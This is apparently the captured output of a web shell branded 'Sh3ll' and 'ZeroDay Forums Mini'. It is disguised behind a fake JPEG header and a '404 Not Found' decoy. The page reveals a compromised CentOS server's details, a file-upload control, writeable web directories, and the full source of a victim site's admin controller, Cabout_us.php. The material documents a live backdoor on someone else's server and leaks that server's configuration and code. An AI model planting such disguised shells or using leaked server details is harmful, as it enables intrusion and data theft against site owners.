����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/adimi/application/modules/dashboard/controllers/Cabout_us.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');

class Cabout_us extends MX_Controller
{

    function __construct()
    {
        parent::__construct();

        $this->load->library('dashboard/labout_us');
        $this->load->model('dashboard/About_us');
        $this->auth->check_user_auth();
    }

    //Default loading for about_us system.
    public function index()
    {
        $this->permission->check_label('why_choose_us')->create()->redirect();

        $content = $this->labout_us->about_us_add_form();
        $this->template_lib->full_admin_html_view($content);
    }

    //Insert about_us
    public function insert_about_us()
    {
        $this->permission->check_label('why_choose_us')->create()->redirect();

        $favicon = $this->input->post('favicon',TRUE);
        $lang_id = $this->input->post('language_id',TRUE);
        $headlines = $this->input->post('headlines',TRUE);
        $details = $this->input->post('details',TRUE);
        $position = $this->input->post('position',TRUE);

        //Link page add
        for ($i = 0, $n = count($lang_id); $i < $n; $i++) {

            $language_id = $lang_id[$i];
            $head_line = $headlines[$i];
            $detail = $details[$i];

            $data = array(
                'language_id' => $language_id,
                'headline' => $head_line,
                'icon' => $favicon,
                'details' => $detail,
                'position' => $position,
                'status' => '1',
            );


            $pos_res = $this->db->select('*')
                ->from('about_us')
                ->where('position', $position)
                ->where('language_id', $language_id)
                ->get()
                ->num_rows();

            if ($pos_res > 0) {
                $this->session->set_userdata(array('error_message' => display('already_exists')));
                redirect(base_url('dashboard/Cabout_us'));
            } else {
                $result = $this->About_us->about_us_entry($data);
            }
        }

        if ($result == TRUE) {
            $this->session->set_userdata(array('message' => display('successfully_added')));
            if (isset($_POST['add-about_us'])) {
                redirect(base_url('dashboard/Cabout_us/manage_about_us'));
            } elseif (isset($_POST['add-about_us-another'])) {
                redirect(base_url('dashboard/Cabout_us'));
            }
        } else {
            $this->session->set_userdata(array('error_message' => display('already_exists')));
            redirect(base_url('dashboard/Cabout_us'));
        }
    }

    //Manage about_us
    public function manage_about_us()
    {
        $this->permission->check_label('why_choose_us')->read()->redirect();

        $content =$this->labout_us->about_us_list();
        $this->template_lib->full_admin_html_view($content);;
    }
    //about_us Update Form
    public function about_us_update_form($content_id)
    {   
        $this->permission->check_label('why_choose_us')->update()->redirect();

        $content = $this->labout_us->about_us_edit_data($content_id);
        $this->template_lib->full_admin_html_view($content);
    }


    // about_us Update
    public function about_us_update($position = null)
    {
        $this->permission->check_label('why_choose_us')->update()->redirect();

        $favicon = $this->input->post('favicon',TRUE);
        $lang_id = $this->input->post('language_id',TRUE);
        $headlines = $this->input->post('headlines',TRUE);
        $details = $this->input->post('details',TRUE);
        $pos = $this->input->post('position',TRUE);

        //Link page add
        for ($i = 0, $n = count($lang_id); $i < $n; $i++) {

            $language_id = $lang_id[$i];
            $head_line = $headlines[$i];
            $detail = $details[$i];

            $pos_res = $this->db->select('*')
                ->from('about_us')
                ->where('position', $pos)
                ->get()
                ->num_rows();

            if ($pos_res > 0) {
                $new = array(
                    'headline' => $head_line,
                    'icon' => $favicon,
                    'details' => $detail,
                );

                $result = $this->About_us->update_about_us($new, $position, $language_id);
            } else {
                $u_pos = array(
                    'headline' => $head_line,
                    'icon' => $favicon,
                    'details' => $detail,
                    'position' => $pos,
                );
                $result = $this->About_us->update_about_us($u_pos, $position, $language_id);
            }
        }

        if ($result == TRUE) {
            $this->session->set_userdata(array('message' => display('successfully_updated')));
            redirect(base_url('dashboard/Cabout_us/manage_about_us'));
        } else {
            $this->session->set_userdata(array('error_message' => display('position_already_exists')));
            redirect(base_url('dashboard/Cabout_us/manage_about_us'));
        }
    }


    // about_us Delete
    public function about_us_delete($about_us_id)
    {
        $this->permission->check_label('why_choose_us')->delete()->redirect();

        $this->About_us->delete_about_us($about_us_id);
        $this->session->set_userdata(array('message' => display('successfully_delete')));
        redirect('dashboard/Cabout_us/manage_about_us');
    }


    //Inactive
    public function inactive($id)
    {
        $this->permission->check_label('why_choose_us')->update()->redirect();

        $this->db->set('status', 0);
        $this->db->where('content_id', $id);
        $this->db->update('about_us');
        $this->session->set_userdata(array('error_message' => display('successfully_inactive')));
        redirect(base_url('dashboard/Cabout_us/manage_about_us'));
    }


    //Active
    public function active($id)
    {
        $this->permission->check_label('why_choose_us')->update()->redirect();
        $this->db->set('status', 1);
        $this->db->where('content_id', $id);
        $this->db->update('about_us');
        $this->session->set_userdata(array('message' => display('successfully_active')));
        redirect(base_url('dashboard/Cabout_us/manage_about_us'));
    }
}

ZeroDay Forums Mini